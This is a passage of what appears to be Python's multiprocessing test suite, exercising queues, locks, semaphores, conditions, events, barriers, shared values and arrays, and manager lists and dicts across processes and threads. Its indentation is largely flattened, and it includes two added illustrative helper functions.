self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
                # qsize is not available on all platforms as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
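# Hedged usage note (illustration, not part of the original test module):
# _DummyList is the shared-memory "atomic counter" described in the comment
# above -- append() bumps a counter and len() reads it, so child processes can
# increment it the way threads would append to a plain list. A minimal sketch
# (mirrors how the Barrier tests below hand these objects to processes):
def _demo_dummy_list_counter(n_procs=3):
    counter = _DummyList()
    procs = [multiprocessing.Process(target=counter.append, args=(True,))
             for _ in range(n_procs)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
    return len(counter)               # == n_procs if every child ran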
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
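# Hedged illustration (not part of the original test module): the Barrier
# tests below check that wait() releases all parties together, each receiving
# a distinct index. A standalone sketch of that behaviour with the public
# multiprocessing.Barrier API (hypothetical helper names):
def _demo_barrier_worker(barrier, results):
    results.put(barrier.wait())       # each party gets a unique index
def _demo_barrier_lockstep(parties=3):
    barrier = multiprocessing.Barrier(parties)
    results = multiprocessing.Queue()
    procs = [multiprocessing.Process(target=_demo_barrier_worker,
                                     args=(barrier, results))
             for _ in range(parties)]
    for p in procs:
        p.start()
    indices = sorted(results.get() for _ in range(parties))
    for p in procs:
        p.join()
    return indices                    # == list(range(parties))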
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
